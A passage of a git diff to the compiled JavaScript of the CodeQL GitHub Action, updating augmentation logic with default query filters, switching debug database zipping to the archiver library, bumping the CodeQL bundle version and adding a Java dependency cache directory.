message: `Encountered a fatal error while running "codeql-for-testing database run-queries --expect-discarded-cache --intra-layer-parallelism --min-disk-free=1024 -v". Exit code was 1 and error was: Oops! A fatal internal error occurred. Details:
|
message: `Encountered a fatal error while running "codeql-for-testing database run-queries --intra-layer-parallelism --min-disk-free=1024 -v". Exit code was 1 and error was: Oops! A fatal internal error occurred. Details:
|
||||||
com.semmle.util.exception.CatastrophicError: An error occurred while evaluating ControlFlowGraph::ControlFlow::Root.isRootOf/1#dispred#f610e6ed/2@86282cc8
|
com.semmle.util.exception.CatastrophicError: An error occurred while evaluating ControlFlowGraph::ControlFlow::Root.isRootOf/1#dispred#f610e6ed/2@86282cc8
|
||||||
Severe disk cache trouble (corruption or out of space) at /home/runner/work/_temp/codeql_databases/go/db-go/default/cache/pages/28/33.pack: Failed to write item to disk. See the logs for more details.`,
|
Severe disk cache trouble (corruption or out of space) at /home/runner/work/_temp/codeql_databases/go/db-go/default/cache/pages/28/33.pack: Failed to write item to disk. See the logs for more details.`,
|
||||||
});
|
});
|
||||||
@@ -638,7 +639,7 @@ for (const { codeqlVersion, flagPassed, githubVersion, negativeFlagPassed, } of
|
|||||||
sinon.stub(io, "which").resolves("");
|
sinon.stub(io, "which").resolves("");
|
||||||
process.env["CODEQL_ACTION_EXTRA_OPTIONS"] =
|
process.env["CODEQL_ACTION_EXTRA_OPTIONS"] =
|
||||||
'{ "database": { "init": ["--overwrite"] } }';
|
'{ "database": { "init": ["--overwrite"] } }';
|
||||||
await codeqlObject.databaseInitCluster(stubConfig, "sourceRoot", undefined, undefined, (0, logging_1.getRunnerLogger)(false));
|
await codeqlObject.databaseInitCluster(stubConfig, "sourceRoot", undefined, undefined, overlay_database_utils_1.OverlayDatabaseMode.None, (0, logging_1.getRunnerLogger)(false));
|
||||||
t.true(runnerConstructorStub.calledOnce);
|
t.true(runnerConstructorStub.calledOnce);
|
||||||
const args = runnerConstructorStub.firstCall.args[1];
|
const args = runnerConstructorStub.firstCall.args[1];
|
||||||
t.is(args.filter((option) => option === "--overwrite").length, 1, "--overwrite should only be passed once");
|
t.is(args.filter((option) => option === "--overwrite").length, 1, "--overwrite should only be passed once");
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
16
lib/config-utils.js
generated
16
lib/config-utils.js
generated
@@ -64,6 +64,7 @@ const yaml = __importStar(require("js-yaml"));
|
|||||||
const semver = __importStar(require("semver"));
|
const semver = __importStar(require("semver"));
|
||||||
const api = __importStar(require("./api-client"));
|
const api = __importStar(require("./api-client"));
|
||||||
const caching_utils_1 = require("./caching-utils");
|
const caching_utils_1 = require("./caching-utils");
|
||||||
|
const diff_informed_analysis_utils_1 = require("./diff-informed-analysis-utils");
|
||||||
const feature_flags_1 = require("./feature-flags");
|
const feature_flags_1 = require("./feature-flags");
|
||||||
const languages_1 = require("./languages");
|
const languages_1 = require("./languages");
|
||||||
const trap_caching_1 = require("./trap-caching");
|
const trap_caching_1 = require("./trap-caching");
|
||||||
@@ -79,6 +80,7 @@ exports.defaultAugmentationProperties = {
|
|||||||
packsInputCombines: false,
|
packsInputCombines: false,
|
||||||
packsInput: undefined,
|
packsInput: undefined,
|
||||||
queriesInput: undefined,
|
queriesInput: undefined,
|
||||||
|
defaultQueryFilters: [],
|
||||||
};
|
};
|
||||||
function getPacksStrInvalid(packStr, configFile) {
|
function getPacksStrInvalid(packStr, configFile) {
|
||||||
return configFile
|
return configFile
|
||||||
@@ -227,7 +229,7 @@ async function getRawLanguages(languagesInput, repository, logger) {
|
|||||||
async function getDefaultConfig({ languagesInput, queriesInput, packsInput, buildModeInput, dbLocation, trapCachingEnabled, dependencyCachingEnabled, debugMode, debugArtifactName, debugDatabaseName, repository, tempDir, codeql, githubVersion, features, logger, }) {
|
async function getDefaultConfig({ languagesInput, queriesInput, packsInput, buildModeInput, dbLocation, trapCachingEnabled, dependencyCachingEnabled, debugMode, debugArtifactName, debugDatabaseName, repository, tempDir, codeql, githubVersion, features, logger, }) {
|
||||||
const languages = await getLanguages(codeql, languagesInput, repository, logger);
|
const languages = await getLanguages(codeql, languagesInput, repository, logger);
|
||||||
const buildMode = await parseBuildModeInput(buildModeInput, languages, features, logger);
|
const buildMode = await parseBuildModeInput(buildModeInput, languages, features, logger);
|
||||||
const augmentationProperties = calculateAugmentation(packsInput, queriesInput, languages);
|
const augmentationProperties = await calculateAugmentation(codeql, features, packsInput, queriesInput, languages, logger);
|
||||||
const { trapCaches, trapCacheDownloadTime } = await downloadCacheWithTime(trapCachingEnabled, codeql, languages, logger);
|
const { trapCaches, trapCacheDownloadTime } = await downloadCacheWithTime(trapCachingEnabled, codeql, languages, logger);
|
||||||
return {
|
return {
|
||||||
languages,
|
languages,
|
||||||
@@ -277,7 +279,7 @@ async function loadConfig({ languagesInput, queriesInput, packsInput, buildModeI
|
|||||||
}
|
}
|
||||||
const languages = await getLanguages(codeql, languagesInput, repository, logger);
|
const languages = await getLanguages(codeql, languagesInput, repository, logger);
|
||||||
const buildMode = await parseBuildModeInput(buildModeInput, languages, features, logger);
|
const buildMode = await parseBuildModeInput(buildModeInput, languages, features, logger);
|
||||||
const augmentationProperties = calculateAugmentation(packsInput, queriesInput, languages);
|
const augmentationProperties = await calculateAugmentation(codeql, features, packsInput, queriesInput, languages, logger);
|
||||||
const { trapCaches, trapCacheDownloadTime } = await downloadCacheWithTime(trapCachingEnabled, codeql, languages, logger);
|
const { trapCaches, trapCacheDownloadTime } = await downloadCacheWithTime(trapCachingEnabled, codeql, languages, logger);
|
||||||
return {
|
return {
|
||||||
languages,
|
languages,
|
||||||
@@ -303,11 +305,14 @@ async function loadConfig({ languagesInput, queriesInput, packsInput, buildModeI
|
|||||||
* and the CLI does not know about these inputs so we need to inject them into
|
* and the CLI does not know about these inputs so we need to inject them into
|
||||||
* the config file sent to the CLI.
|
* the config file sent to the CLI.
|
||||||
*
|
*
|
||||||
|
* @param codeql The CodeQL object.
|
||||||
|
* @param features The feature enablement object.
|
||||||
* @param rawPacksInput The packs input from the action configuration.
|
* @param rawPacksInput The packs input from the action configuration.
|
||||||
* @param rawQueriesInput The queries input from the action configuration.
|
* @param rawQueriesInput The queries input from the action configuration.
|
||||||
* @param languages The languages that the config file is for. If the packs input
|
* @param languages The languages that the config file is for. If the packs input
|
||||||
* is non-empty, then there must be exactly one language. Otherwise, an
|
* is non-empty, then there must be exactly one language. Otherwise, an
|
||||||
* error is thrown.
|
* error is thrown.
|
||||||
|
* @param logger The logger to use for logging.
|
||||||
*
|
*
|
||||||
* @returns The properties that need to be augmented in the config file.
|
* @returns The properties that need to be augmented in the config file.
|
||||||
*
|
*
|
||||||
@@ -315,16 +320,21 @@ async function loadConfig({ languagesInput, queriesInput, packsInput, buildModeI
|
|||||||
* not have exactly one language.
|
* not have exactly one language.
|
||||||
*/
|
*/
|
||||||
// exported for testing.
|
// exported for testing.
|
||||||
function calculateAugmentation(rawPacksInput, rawQueriesInput, languages) {
|
async function calculateAugmentation(codeql, features, rawPacksInput, rawQueriesInput, languages, logger) {
|
||||||
const packsInputCombines = shouldCombine(rawPacksInput);
|
const packsInputCombines = shouldCombine(rawPacksInput);
|
||||||
const packsInput = parsePacksFromInput(rawPacksInput, languages, packsInputCombines);
|
const packsInput = parsePacksFromInput(rawPacksInput, languages, packsInputCombines);
|
||||||
const queriesInputCombines = shouldCombine(rawQueriesInput);
|
const queriesInputCombines = shouldCombine(rawQueriesInput);
|
||||||
const queriesInput = parseQueriesFromInput(rawQueriesInput, queriesInputCombines);
|
const queriesInput = parseQueriesFromInput(rawQueriesInput, queriesInputCombines);
|
||||||
|
const defaultQueryFilters = [];
|
||||||
|
if (await (0, diff_informed_analysis_utils_1.shouldPerformDiffInformedAnalysis)(codeql, features, logger)) {
|
||||||
|
defaultQueryFilters.push({ exclude: { tags: "exclude-from-incremental" } });
|
||||||
|
}
|
||||||
return {
|
return {
|
||||||
packsInputCombines,
|
packsInputCombines,
|
||||||
packsInput: packsInput?.[languages[0]],
|
packsInput: packsInput?.[languages[0]],
|
||||||
queriesInput,
|
queriesInput,
|
||||||
queriesInputCombines,
|
queriesInputCombines,
|
||||||
|
defaultQueryFilters,
|
||||||
};
|
};
|
||||||
}
|
}
|
||||||
function parseQueriesFromInput(rawQueriesInput, queriesInputCombines) {
|
function parseQueriesFromInput(rawQueriesInput, queriesInputCombines) {
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
9
lib/config-utils.test.js
generated
9
lib/config-utils.test.js
generated
@@ -624,7 +624,7 @@ const packSpecPrettyPrintingMacro = ava_1.default.macro({
|
|||||||
const mockLogger = (0, logging_1.getRunnerLogger)(true);
|
const mockLogger = (0, logging_1.getRunnerLogger)(true);
|
||||||
const calculateAugmentationMacro = ava_1.default.macro({
|
const calculateAugmentationMacro = ava_1.default.macro({
|
||||||
exec: async (t, _title, rawPacksInput, rawQueriesInput, languages, expectedAugmentationProperties) => {
|
exec: async (t, _title, rawPacksInput, rawQueriesInput, languages, expectedAugmentationProperties) => {
|
||||||
const actualAugmentationProperties = configUtils.calculateAugmentation(rawPacksInput, rawQueriesInput, languages);
|
const actualAugmentationProperties = await configUtils.calculateAugmentation((0, codeql_1.getCachedCodeQL)(), (0, testing_utils_1.createFeatures)([]), rawPacksInput, rawQueriesInput, languages, mockLogger);
|
||||||
t.deepEqual(actualAugmentationProperties, expectedAugmentationProperties);
|
t.deepEqual(actualAugmentationProperties, expectedAugmentationProperties);
|
||||||
},
|
},
|
||||||
title: (_, title) => `Calculate Augmentation: ${title}`,
|
title: (_, title) => `Calculate Augmentation: ${title}`,
|
||||||
@@ -634,34 +634,39 @@ const calculateAugmentationMacro = ava_1.default.macro({
|
|||||||
queriesInput: undefined,
|
queriesInput: undefined,
|
||||||
packsInputCombines: false,
|
packsInputCombines: false,
|
||||||
packsInput: undefined,
|
packsInput: undefined,
|
||||||
|
defaultQueryFilters: [],
|
||||||
});
|
});
|
||||||
(0, ava_1.default)(calculateAugmentationMacro, "With queries", undefined, " a, b , c, d", [languages_1.Language.javascript], {
|
(0, ava_1.default)(calculateAugmentationMacro, "With queries", undefined, " a, b , c, d", [languages_1.Language.javascript], {
|
||||||
queriesInputCombines: false,
|
queriesInputCombines: false,
|
||||||
queriesInput: [{ uses: "a" }, { uses: "b" }, { uses: "c" }, { uses: "d" }],
|
queriesInput: [{ uses: "a" }, { uses: "b" }, { uses: "c" }, { uses: "d" }],
|
||||||
packsInputCombines: false,
|
packsInputCombines: false,
|
||||||
packsInput: undefined,
|
packsInput: undefined,
|
||||||
|
defaultQueryFilters: [],
|
||||||
});
|
});
|
||||||
(0, ava_1.default)(calculateAugmentationMacro, "With queries combining", undefined, " + a, b , c, d ", [languages_1.Language.javascript], {
|
(0, ava_1.default)(calculateAugmentationMacro, "With queries combining", undefined, " + a, b , c, d ", [languages_1.Language.javascript], {
|
||||||
queriesInputCombines: true,
|
queriesInputCombines: true,
|
||||||
queriesInput: [{ uses: "a" }, { uses: "b" }, { uses: "c" }, { uses: "d" }],
|
queriesInput: [{ uses: "a" }, { uses: "b" }, { uses: "c" }, { uses: "d" }],
|
||||||
packsInputCombines: false,
|
packsInputCombines: false,
|
||||||
packsInput: undefined,
|
packsInput: undefined,
|
||||||
|
defaultQueryFilters: [],
|
||||||
});
|
});
|
||||||
(0, ava_1.default)(calculateAugmentationMacro, "With packs", " codeql/a , codeql/b , codeql/c , codeql/d ", undefined, [languages_1.Language.javascript], {
|
(0, ava_1.default)(calculateAugmentationMacro, "With packs", " codeql/a , codeql/b , codeql/c , codeql/d ", undefined, [languages_1.Language.javascript], {
|
||||||
queriesInputCombines: false,
|
queriesInputCombines: false,
|
||||||
queriesInput: undefined,
|
queriesInput: undefined,
|
||||||
packsInputCombines: false,
|
packsInputCombines: false,
|
||||||
packsInput: ["codeql/a", "codeql/b", "codeql/c", "codeql/d"],
|
packsInput: ["codeql/a", "codeql/b", "codeql/c", "codeql/d"],
|
||||||
|
defaultQueryFilters: [],
|
||||||
});
|
});
|
||||||
(0, ava_1.default)(calculateAugmentationMacro, "With packs combining", " + codeql/a, codeql/b, codeql/c, codeql/d", undefined, [languages_1.Language.javascript], {
|
(0, ava_1.default)(calculateAugmentationMacro, "With packs combining", " + codeql/a, codeql/b, codeql/c, codeql/d", undefined, [languages_1.Language.javascript], {
|
||||||
queriesInputCombines: false,
|
queriesInputCombines: false,
|
||||||
queriesInput: undefined,
|
queriesInput: undefined,
|
||||||
packsInputCombines: true,
|
packsInputCombines: true,
|
||||||
packsInput: ["codeql/a", "codeql/b", "codeql/c", "codeql/d"],
|
packsInput: ["codeql/a", "codeql/b", "codeql/c", "codeql/d"],
|
||||||
|
defaultQueryFilters: [],
|
||||||
});
|
});
|
||||||
const calculateAugmentationErrorMacro = ava_1.default.macro({
|
const calculateAugmentationErrorMacro = ava_1.default.macro({
|
||||||
exec: async (t, _title, rawPacksInput, rawQueriesInput, languages, expectedError) => {
|
exec: async (t, _title, rawPacksInput, rawQueriesInput, languages, expectedError) => {
|
||||||
t.throws(() => configUtils.calculateAugmentation(rawPacksInput, rawQueriesInput, languages), { message: expectedError });
|
await t.throwsAsync(() => configUtils.calculateAugmentation((0, codeql_1.getCachedCodeQL)(), (0, testing_utils_1.createFeatures)([]), rawPacksInput, rawQueriesInput, languages, mockLogger), { message: expectedError });
|
||||||
},
|
},
|
||||||
title: (_, title) => `Calculate Augmentation Error: ${title}`,
|
title: (_, title) => `Calculate Augmentation Error: ${title}`,
|
||||||
});
|
});
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
57
lib/debug-artifacts.js
generated
57
lib/debug-artifacts.js
generated
@@ -46,7 +46,7 @@ const path = __importStar(require("path"));
|
|||||||
const artifact = __importStar(require("@actions/artifact"));
|
const artifact = __importStar(require("@actions/artifact"));
|
||||||
const artifactLegacy = __importStar(require("@actions/artifact-legacy"));
|
const artifactLegacy = __importStar(require("@actions/artifact-legacy"));
|
||||||
const core = __importStar(require("@actions/core"));
|
const core = __importStar(require("@actions/core"));
|
||||||
const adm_zip_1 = __importDefault(require("adm-zip"));
|
const archiver_1 = __importDefault(require("archiver"));
|
||||||
const del_1 = __importDefault(require("del"));
|
const del_1 = __importDefault(require("del"));
|
||||||
const actions_util_1 = require("./actions-util");
|
const actions_util_1 = require("./actions-util");
|
||||||
const analyze_1 = require("./analyze");
|
const analyze_1 = require("./analyze");
|
||||||
@@ -66,26 +66,28 @@ async function uploadCombinedSarifArtifacts(logger, gitHubVariant, codeQlVersion
|
|||||||
const tempDir = (0, actions_util_1.getTemporaryDirectory)();
|
const tempDir = (0, actions_util_1.getTemporaryDirectory)();
|
||||||
// Upload Actions SARIF artifacts for debugging when environment variable is set
|
// Upload Actions SARIF artifacts for debugging when environment variable is set
|
||||||
if (process.env["CODEQL_ACTION_DEBUG_COMBINED_SARIF"] === "true") {
|
if (process.env["CODEQL_ACTION_DEBUG_COMBINED_SARIF"] === "true") {
|
||||||
logger.info("Uploading available combined SARIF files as Actions debugging artifact...");
|
await (0, logging_1.withGroup)("Uploading combined SARIF debug artifact", async () => {
|
||||||
const baseTempDir = path.resolve(tempDir, "combined-sarif");
|
logger.info("Uploading available combined SARIF files as Actions debugging artifact...");
|
||||||
const toUpload = [];
|
const baseTempDir = path.resolve(tempDir, "combined-sarif");
|
||||||
if (fs.existsSync(baseTempDir)) {
|
const toUpload = [];
|
||||||
const outputDirs = fs.readdirSync(baseTempDir);
|
if (fs.existsSync(baseTempDir)) {
|
||||||
for (const outputDir of outputDirs) {
|
const outputDirs = fs.readdirSync(baseTempDir);
|
||||||
const sarifFiles = fs
|
for (const outputDir of outputDirs) {
|
||||||
.readdirSync(path.resolve(baseTempDir, outputDir))
|
const sarifFiles = fs
|
||||||
.filter((f) => f.endsWith(".sarif"));
|
.readdirSync(path.resolve(baseTempDir, outputDir))
|
||||||
for (const sarifFile of sarifFiles) {
|
.filter((f) => f.endsWith(".sarif"));
|
||||||
toUpload.push(path.resolve(baseTempDir, outputDir, sarifFile));
|
for (const sarifFile of sarifFiles) {
|
||||||
|
toUpload.push(path.resolve(baseTempDir, outputDir, sarifFile));
|
||||||
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
try {
|
||||||
try {
|
await uploadDebugArtifacts(logger, toUpload, baseTempDir, "combined-sarif-artifacts", gitHubVariant, codeQlVersion);
|
||||||
await uploadDebugArtifacts(logger, toUpload, baseTempDir, "combined-sarif-artifacts", gitHubVariant, codeQlVersion);
|
}
|
||||||
}
|
catch (e) {
|
||||||
catch (e) {
|
logger.warning(`Failed to upload combined SARIF files as Actions debugging artifact. Reason: ${(0, util_1.getErrorMessage)(e)}`);
|
||||||
logger.warning(`Failed to upload combined SARIF files as Actions debugging artifact. Reason: ${(0, util_1.getErrorMessage)(e)}`);
|
}
|
||||||
}
|
});
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
/**
|
/**
|
||||||
@@ -248,9 +250,20 @@ async function createPartialDatabaseBundle(config, language) {
|
|||||||
if (fs.existsSync(databaseBundlePath)) {
|
if (fs.existsSync(databaseBundlePath)) {
|
||||||
await (0, del_1.default)(databaseBundlePath, { force: true });
|
await (0, del_1.default)(databaseBundlePath, { force: true });
|
||||||
}
|
}
|
||||||
const zip = new adm_zip_1.default();
|
const output = fs.createWriteStream(databaseBundlePath);
|
||||||
zip.addLocalFolder(databasePath);
|
const zip = (0, archiver_1.default)("zip");
|
||||||
zip.writeZip(databaseBundlePath);
|
zip.on("error", (err) => {
|
||||||
|
throw err;
|
||||||
|
});
|
||||||
|
zip.on("warning", (err) => {
|
||||||
|
// Ignore ENOENT warnings. There's nothing anyone can do about it.
|
||||||
|
if (err.code !== "ENOENT") {
|
||||||
|
throw err;
|
||||||
|
}
|
||||||
|
});
|
||||||
|
zip.pipe(output);
|
||||||
|
zip.directory(databasePath, false);
|
||||||
|
await zip.finalize();
|
||||||
return databaseBundlePath;
|
return databaseBundlePath;
|
||||||
}
|
}
|
||||||
/**
|
/**
|
||||||
|
|||||||
File diff suppressed because one or more lines are too long
@@ -1,6 +1,6 @@
|
|||||||
{
|
{
|
||||||
"bundleVersion": "codeql-bundle-v2.20.3",
|
"bundleVersion": "codeql-bundle-v2.21.1",
|
||||||
"cliVersion": "2.20.3",
|
"cliVersion": "2.21.1",
|
||||||
"priorBundleVersion": "codeql-bundle-v2.20.2",
|
"priorBundleVersion": "codeql-bundle-v2.21.0",
|
||||||
"priorCliVersion": "2.20.2"
|
"priorCliVersion": "2.21.0"
|
||||||
}
|
}
|
||||||
|
|||||||
12
lib/dependency-caching.js
generated
12
lib/dependency-caching.js
generated
@@ -33,17 +33,27 @@ var __importStar = (this && this.__importStar) || (function () {
|
|||||||
};
|
};
|
||||||
})();
|
})();
|
||||||
Object.defineProperty(exports, "__esModule", { value: true });
|
Object.defineProperty(exports, "__esModule", { value: true });
|
||||||
|
exports.getJavaTempDependencyDir = getJavaTempDependencyDir;
|
||||||
exports.downloadDependencyCaches = downloadDependencyCaches;
|
exports.downloadDependencyCaches = downloadDependencyCaches;
|
||||||
exports.uploadDependencyCaches = uploadDependencyCaches;
|
exports.uploadDependencyCaches = uploadDependencyCaches;
|
||||||
const os = __importStar(require("os"));
|
const os = __importStar(require("os"));
|
||||||
const path_1 = require("path");
|
const path_1 = require("path");
|
||||||
const actionsCache = __importStar(require("@actions/cache"));
|
const actionsCache = __importStar(require("@actions/cache"));
|
||||||
const glob = __importStar(require("@actions/glob"));
|
const glob = __importStar(require("@actions/glob"));
|
||||||
|
const actions_util_1 = require("./actions-util");
|
||||||
const caching_utils_1 = require("./caching-utils");
|
const caching_utils_1 = require("./caching-utils");
|
||||||
const environment_1 = require("./environment");
|
const environment_1 = require("./environment");
|
||||||
const util_1 = require("./util");
|
const util_1 = require("./util");
|
||||||
const CODEQL_DEPENDENCY_CACHE_PREFIX = "codeql-dependencies";
|
const CODEQL_DEPENDENCY_CACHE_PREFIX = "codeql-dependencies";
|
||||||
const CODEQL_DEPENDENCY_CACHE_VERSION = 1;
|
const CODEQL_DEPENDENCY_CACHE_VERSION = 1;
|
||||||
|
/**
|
||||||
|
* Returns a path to a directory intended to be used to store .jar files
|
||||||
|
* for the Java `build-mode: none` extractor.
|
||||||
|
* @returns The path to the directory that should be used by the `build-mode: none` extractor.
|
||||||
|
*/
|
||||||
|
function getJavaTempDependencyDir() {
|
||||||
|
return (0, path_1.join)((0, actions_util_1.getTemporaryDirectory)(), "codeql_java", "repository");
|
||||||
|
}
|
||||||
/**
|
/**
|
||||||
* Default caching configurations per language.
|
* Default caching configurations per language.
|
||||||
*/
|
*/
|
||||||
@@ -54,6 +64,8 @@ const CODEQL_DEFAULT_CACHE_CONFIG = {
|
|||||||
(0, path_1.join)(os.homedir(), ".m2", "repository"),
|
(0, path_1.join)(os.homedir(), ".m2", "repository"),
|
||||||
// Gradle
|
// Gradle
|
||||||
(0, path_1.join)(os.homedir(), ".gradle", "caches"),
|
(0, path_1.join)(os.homedir(), ".gradle", "caches"),
|
||||||
|
// CodeQL Java build-mode: none
|
||||||
|
getJavaTempDependencyDir(),
|
||||||
],
|
],
|
||||||
hash: [
|
hash: [
|
||||||
// Maven
|
// Maven
|
||||||
|
|||||||
@@ -1 +1 @@
|
|||||||
{"version":3,"file":"dependency-caching.js","sourceRoot":"","sources":["../src/dependency-caching.ts"],"names":[],"mappings":"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"}
|
